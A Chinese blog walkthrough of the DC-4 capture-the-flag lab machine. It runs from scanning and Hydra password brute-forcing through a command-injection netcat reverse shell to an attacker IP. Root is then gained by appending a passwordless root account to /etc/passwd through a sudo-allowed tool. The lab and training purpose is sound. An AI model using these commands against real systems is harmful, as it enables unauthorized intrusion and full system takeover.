DC-4靶机攻略

最新推荐文章于 2023-06-22 20:22:27 发布
最新推荐文章于 2023-06-22 20:22:27 发布
阅读量313 收藏 1
点赞数 1
分类专栏: DC靶机通关指南全家桶 文章标签: 安全 靶机 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47311099/article/details/118806771
版权

DC-4攻略

信息收集

主机发现

nmap -sP 192.168.64.0/24 -oN nmap.sP  

发现目标主机ip为192.168.64.139

端口扫描

nmap -A 192.168.64.139 -p 1-65535 -oN nmap_A

发现80http 和22ssh

访问80

在这里插入图片描述

目录扫描

dirb http://192.168.64.139  

后台登录主页为http://192.168.64.139/index.php

渗透

爆破web账密

发现以post方式传参到login.php

在这里插入图片描述

使用hydra爆破表单

hydra -l <用户名> -P <密码字典> <IP地址> <表单参数> <登录失败消息>
hydra -l admin -P pass 192.168.64.139 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" 

密码为happy

登录页面查看信息

发现页面中存在远程命令执行

在这里插入图片描述

远程命令执行反弹shell

bp抓包修改命令

nc 监听端口或发起tcp/udp连接
kali本地监听端口
nc -lvvp 8080
nc+192.168.64.131+8080+-e+/bin/bash         发起连接  空格用+代替

获得交互性shell

python -c 'import pty;pty.spawn("/bin/sh")'  获得交互性shell

查找信息

进入home中jim目录发现mbox权限奇怪 但是我们没权限进去
$ ls -l
ls -l
total 12
drwxr-xr-x 2 jim jim 4096 Apr  7  2019 backups
-rw------- 1 jim jim  528 Apr  6  2019 mbox
-rwsrwxrwx 1 jim jim  174 Apr  6  2019 test.sh


进入home中jim目录backups目录,发现old-passwords
推测他可能是记录的密码,保存为字典
查看用户
cat /etc/passwd
发现两个用户jim和sam
考虑ssh爆破

爆破ssh

hydra -l jim -P pass ssh://192.168.64.139 -v -f

jim密码为jibril04


ssh登录jim
ssh jim@192.168.64.138 

cat mbox
发现是root发的邮件,去var/mali看一眼
cd /var/mali
cat jim
获得用户Charles密码^xHhA&hvim0y

切换到Charles用户
su Charles   发现没有用户
考虑外国人喜欢首字母大写
su charles   成功

提权

发现可以免密sudo使用teehe
charles@dc-4:/var/mail$ sudo -l
sudo -l
Matching Defaults entries for charles on dc-4:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on dc-4:
    (root) NOPASSWD: /usr/bin/teehee

sudo提权

echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd  
建立无密码用户并给root权限

免密登录

su admin

cd /root
ls
cat flag.txt  通关
Forest深林
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
DC-4渗透靶机详解
weixin_51083551的博客
09-12 3994
萌新DC系列靶机渗透详解之 DC-4 “DC-3好难呜呜,先打DC-4” 1. 明确目标 获得靶机 root 权限,找到root账户下的 flag 2. 信息收集 使用 arp-scan 扫描网段下的主机 └─# arp-scan -l
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
dc-4靶机练习.docx
01-02
第一步;靶机在web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新用户的登陆口令。 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有root权限
DC-4靶机渗透
qq_56805195的博客
07-07 1036
第一次写文章,请各位大佬指教
DC-4靶机渗透测试
qq_60463414的博客
07-07 2325
DC4靶机shell反弹,提权流程。
靶机DC-4—WP
m0_66638011的博客
06-22 744
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试。DC-4靶场破过程:1.首先我们进行主机发现,将测试机的网站进行了指纹扫描,发现它没有任何框架。2.然后我们进行bp抓包,发现了暴力破解漏洞。
2022-渗透测试-web目录爆破-常用的三个工具
保持微笑的博客
01-27 1万+
目录 1.dirb 2.dirbuster 3.ffuf 1.dirb dirb我之前写过一篇博客,这里再详细介绍一下。 dirb简介 dirb是一个基于字典的web目录扫描工具,采用递归的方式来获取更多的目录,可以查找到已知的和隐藏的目录,它还支持代理和http认证限制访问的网站在渗透测试过程中,是一个非常好用的工具。 dirb命令参数 格式:dirb <url_base> [<wordlist_file(s)>] [options] -a 设置user.
web网站目录爆破工具Dirb使用指南
liver100day的博客
11-18 1万+
文章目录工具简介命令参数基本使用列举具有特定扩展名列表的目录将输出保存到磁盘忽不必要的状态码速度延迟不递归(-r)显示不存在页面不对网址(-t)强制使用结尾的“ /”HTTP授权进行扫描代理网址后言 工具简介 dirb是一个基于字典的web目录扫描工具,查找现有的(和/或隐藏的)Web对象,通过对Web服务器发起基于字典的击并分析响应的数据。 采用递归的方式来获取更多的目录,它还支持代理和http认证限制访问的网站,是在信息收集阶段获取目标信息常用工具手段。 命令参数 格式:dirb <url_b
dirb网站目录扫描工具详解
有勇气的牛排博客
07-29 5707
1 介绍 有勇气的牛排 — 防 Kali Linux提供一款基于字典的Web目录扫描工具DIRB。该工具根据用户提供的字典,对目标网站目录进行暴力猜测。它会尝试以递归方式进行爆破,以发现更多的路径。同时,该工具支持代理、HTTP认证扫描限制访问的网站。该工具还提供两个命令,帮助用户从网页生成字典,或者生成定制字典。 1.1 什么是dirb DIRB 是一个基于命令行的工具,可以根据单词列表对任何目录进行暴力破解。 DIRB 会发出一个 HTTP 请求,并查看每个请求的 HTTP 响应代码 1.2 如何工作
DC-4靶机提权超详细过程
最新发布
02-29
本资源主要讲述了DC-4靶机提权拿到flag的全部详细过程,每一个步骤都有详细记录,希望可以帮助到大家。 (因为我把笔记导出为了pdf版本,所以只能用这种形式发出,该资源不需要消耗积分,也不需要付费哦,可放心使用...
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
DC-4靶机渗透(teehee提权)
single_g_l的博客
03-26 4723
一、环境 靶机: 192.168.1.177 击机: 192.168.1.209 二、信息收集 1. 主机发现 namp -sP 192.168.1.0/24 或 arp-scan -l # 查看开放端口 nmap -A -sS -p- 192.168.1.177 2. 访问192.168.1.177:80 三、拿到管理后台密码 方法1. 用burp爆破模块,获取管理员登录界面的密码 01. 用burp抓包,爆破拿到密码(记得准备一个常用密码合集,...
DC系列靶机渗透之DC-4
weixin_52515588的博客
06-10 402
打开靶机,扫描IP地址,确定IP地址以后,利用nmap扫描开放的服务。 如上图可知打开了80,22端口,那么我们访问一下。 利用80端口发现了网站登录页面。接下来,我们需要用到用户名和密码。在kali中有一款爆破密码的工具john中有一套密码字典,那么我们就利用这个密码字典进行爆破。 把文件复制到一个路径下面。接下来就需要用到burp爆破。我的burp是安装在主机,那么就需要设置一下。 在IP栏选择一个地址,记住不要选127.0.0.1因为那个是本机的地址,随便选择一个自己喜欢的,填写一个没有被占用的端口
dc-4靶机渗透记录
wlllllianqing的博客
11-07 3953
DC-4靶机 实验环境 靶机DC-4靶机(192.168.126.138) 击机:kali Linux(192.168.126.129) 信息收集 ip:192.168.126.138 开放的端口: 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0) 7.4p1 Debian 10+deb9u6(协议2.0) 80/tcp开放 http nginx 1.15.10 运行:Linux 3.X |
dirb教程
热门推荐
weixin_44912169的博客
04-21 2万+
dirb教程 dirb是一个基于字典的web目录扫描工具,会用递归的方式来获取更多的目录,它还支持代理和http认证限制访问的网站 格式:dirb <url_base> [<wordlist_file(s)>] [options] -a 设置user-agent -p <proxy[:port]>设置代理 -c 设置cookie -z 添加毫秒延迟,...
dc-4 靶机渗透学习
..
03-19 2954
信息收集 第一步还是老办法,探测主机存活。 nmap -sP 192.168.202.0/24 通过推断得出192.168.202.142是靶机,具体请看dc-2、dc-3,对靶机进行端口扫描。 nmap -A -p- -v 192.168.202.142 发现22、80端口开启,访问一下80端口,发现是个登录页面。 用Wappalyzer识别框架,没试别出,查看源代码发现只是一个简单的登录界面 这种情况感觉没必要再用nikto扫描了,尝试用bp爆...
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Forest深林

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值